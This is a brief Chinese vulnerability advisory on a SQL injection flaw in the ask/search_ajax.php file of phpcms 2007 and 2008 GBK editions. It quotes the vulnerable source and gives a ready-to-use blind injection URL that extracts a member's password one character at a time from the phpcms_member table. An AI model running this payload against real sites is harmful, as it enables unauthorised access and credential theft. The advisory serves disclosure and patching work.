影响版本:
phpcms 2008 GBK phpcms 2007 GBK
漏洞描述:
PHPCMS 是国内领先的网站管理系统,同时也是一个开源的PHP开发框架 漏洞文件:ask/search_ajax.php code: <?php require './include/common.inc.php'; require_once MOD_ROOT.'include/ask.class.php'; $ask = new ask(); header('Content-type: text/html; charset=utf-8'); if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q); if($q) { $where = " title LIKE '%$q%' AND status = 5"; } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10); foreach($infos as $key=>$val) { $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']); $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title']; $info[$key]['url'] = $val['url']; } echo(json_encode($info)); ?>
<*参考
ssvdb
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
安全建议:
参考官方补丁
0 条评论。